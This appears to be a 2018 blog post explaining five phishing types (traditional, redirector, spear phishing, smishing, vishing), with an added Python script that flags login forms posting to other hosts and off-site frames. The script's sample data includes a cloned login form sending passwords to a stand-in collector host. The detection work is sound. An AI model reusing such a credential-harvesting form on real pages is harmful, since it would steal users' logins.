Sunday, December 16, 2018

The 5 types of phishing you should beware of

How to recognize each type of threat?


It seems that every data breach and online attack is associated with a phishing attempt to steal credentials and passwords, run fraudulent transactions or trick someone into downloading malware. According to PhishMe statistics, in early 2016, 93% of phishing emails were carrying ransomware.

Businesses regularly remind users to beware of phishing attacks, but many users do not know how to recognize them. One of the reasons for this is the fact that these attacks can take various forms. “Phishing attacks come in all shapes and sizes, designed for specific individuals in organizations who have access to confidential data,” says Shalabh Mohan of Area 1 Security.

Users are generally not well versed in spotting fraud. According to Verizon's cybersecurity report, an attacker sending 10 phishing emails has a 90 percent chance that at least one person will take the bait. At first, this seems absurd, but it is reasonable if viewed in the context of users outside the technology sector, for example in manufacturing and education.

Add to this the fact that not all phishing scammers work the same way - some of them send emails to everyone, while others carefully profile the victim to target a particular type of person - and it becomes even more difficult to train users to recognize suspicious messages.

Some of the most used excuses to deceive the user are:

  • Change in bank or service regulations.
  • Incorrect closing of the user session.
  • Improvements in security measures.
  • Account lock for security reasons or change of access codes.
  • Updating the conditions of use of the service.

The objectives of the scams are:

  • Steal credit card numbers.
  • Steal PINs.
  • Steal passwords, accounts and profiles on social networks.
  • Impersonate the victim on social networks.


Let's look at the different types of phishing attacks

The 5 Types of Phishing

In general, we can say that all the techniques we describe in this post are linked to Social Engineering. Typically, attackers pose as a well-known company, social network, financial institution or online retailer in order to steal confidential information from victims.

This type of malicious campaign can be seen daily in the UK, the US and other European countries, so today we will give you tips to identify the 5 types of phishing you may come across.

1. Traditional Phishing

This type of attack is the simplest to analyze technically; it usually consists of a copy of a site known to the victim, in which the address to which the entered data is sent has been changed. In this way, the cybercriminal steals the credentials entered by the user, which may be stored in a plain text file or sent to an email mailbox.

The main feature of traditional phishing is that it relies on a single website, which hosts all of the fake portal's content.

In the image below, we can see a phishing site impersonating PayPal. The page was hosted on another site, which had allegedly been compromised and then used to host the fraudulent page.

Paypal traditional Phishing


2. Phishing Redirector

As in the previous case, this technique is used in massive campaigns which, despite the low percentage of victims, still affect a large number of users and, consequently, compromise many credentials.

This procedure is more complex and, unlike the previous one, uses at least two sites or domains to carry out the deception. Several known methods can be classified within this type of phishing.

However, we can highlight three techniques that are commonly detected by the ESET Research Laboratory: the use of URL shorteners, the injection of iframes, and the abuse of frames in the HTML code.

Although they are different concepts, they all have something in common: using one address to display a site stored on a given server through another, which is visible only by examining the source code.

In this way, cybercriminals try to prolong the time it takes security teams to detect and take down the content of the fake sites.
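The two traits described in sections 1 and 2 are both visible in a page's source: a cloned login form whose submit address has been changed to point somewhere else, and a frame or iframe that displays content stored on a different server. The following Python script is an added example for this post (not code from the original article or from ESET); it parses a page's HTML and flags both. The sample pages, host names (example.com/example.net/example.org, the documentation address 203.0.113.5) and the function names are all constructed for the example.

```python
"""Flag two phishing page traits in HTML source:
 - a form whose action posts to a host other than the page's own host
   (traditional phishing: the address the entered data goes to was changed)
 - <frame>/<iframe> elements that load content from another host
   (redirector phishing: one address reflects a site stored on another server)
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _Collector(HTMLParser):
    """Collect form actions and frame sources while walking the HTML."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.frame_sources = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag in ("iframe", "frame"):
            self.frame_sources.append(attrs.get("src") or "")


def _host(url):
    """Lower-cased host part of a URL ('' if the URL has none)."""
    return (urlsplit(url).hostname or "").lower()


def analyse_page(page_url, html):
    """Return a list of (finding, resolved_target_url) tuples for the page.

    Relative actions/sources are resolved against page_url, so a form that
    posts to '/login' on the same host is not reported.
    """
    parser = _Collector()
    parser.feed(html)
    page_host = _host(page_url)
    findings = []
    for action in parser.form_actions:
        target = urljoin(page_url, action)
        if _host(target) != page_host:
            findings.append(("form-posts-offsite", target))
    for src in parser.frame_sources:
        target = urljoin(page_url, src)
        if _host(target) != page_host:
            findings.append(("frame-loads-offsite", target))
    return findings


# Constructed sample pages (not captured from any real campaign).
CLONED_LOGIN = """
<html><body><h1>Sign in</h1>
<form method="post" action="http://collector.example.net/grab.php">
  <input name="user"><input name="pass" type="password"><button>Log in</button>
</form></body></html>
"""

BENIGN_LOGIN = """
<html><body>
<form method="post" action="/login">
  <input name="user"><input name="pass" type="password"><button>Log in</button>
</form></body></html>
"""

FRAMED_PAGE = """
<html><frameset rows="100%">
  <frame src="http://203.0.113.5/login/">
</frameset></html>
"""


if __name__ == "__main__":
    for url, html in (("https://accounts.example.com/login", CLONED_LOGIN),
                      ("https://accounts.example.com/login", BENIGN_LOGIN),
                      ("http://promo.example.org/index.html", FRAMED_PAGE)):
        print(url, "->", analyse_page(url, html) or "no findings")
```

The check is deliberately conservative: it only compares hosts, so it will miss a form that posts back to the same compromised host and then forwards the data, and it will flag legitimate sites that use a separate authentication domain. It is meant as a triage aid for a security team reviewing a reported page, not as a standalone verdict.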

3. Spear Phishing

The main difference with this kind is that it is aimed at a few people or small groups. In this way, the campaigns are much more personalized and have a much higher percentage of victims.

It is not common to see cases that target banks or social networks, since this type does not seek scale; on the contrary, this method is used in attacks such as APTs, directed at employees of companies with certain profiles. This means that victims can receive a personalized e-mail addressed with their first and last names, including spoofed sender addresses that they know, to generate greater trust and empathy in a careless user.

@Security Today


We must bear in mind that if cybercriminals want to get into the systems, they will look for the weakest link in the network. Therefore, we should not expect the systems manager to be the main target of this type of attack, but rather someone with less technical knowledge, as in many cases are people from non-IT areas (for example, administration or human resources).

This methodology, together with Social Engineering and a prior study of the victims, produces a solid technique with which one can easily compromise a corporate system or network with the objective of stealing credentials. For this reason, once again, the awareness and training of employees in good Information Security practices is fundamental.

4. SMS Smishing

This type of phishing uses another digital channel: mobile phones. Typically, cybercriminals pose as known institutions and send a text message alerting the victim that they have won a prize. In general, victims respond with some type of code or unique number to validate their false award.

As usual, the purpose of this operation is financial gain, often through scams of various kinds. In Latin America, for example, campaigns were found that used "congratulations" messages to inform victims that they had supposedly won a prize. In these cases, personal data were requested, or fake telephone call centers were even set up, where in a very professional manner they deceived victims into handing over their bank account details and even credit card numbers.

In the image below, we can see a typical case of smishing.

SMS Smishing


Because this type of application does not require sending an SMS but only an Internet connection, the threat spreads very quickly and at little cost to the attacker.

5. Vishing

As mentioned above, fake telephone call centers are set up that make calls with the purpose of committing fraud; these are cases of vishing.

This attack is often combined with another so that the two complement each other, gaining credibility and deceiving the victim more easily and effectively.

Vishing


To protect yourself from such threats and identify them easily, it is important to keep in mind the 6 tips for recognizing phishing emails. Maintaining an up-to-date security solution that can combat these threats is also critical.


By sharing this content and keeping the tips above in mind, you can protect yourself and your environment while taking advantage of technology safely and worry-free.
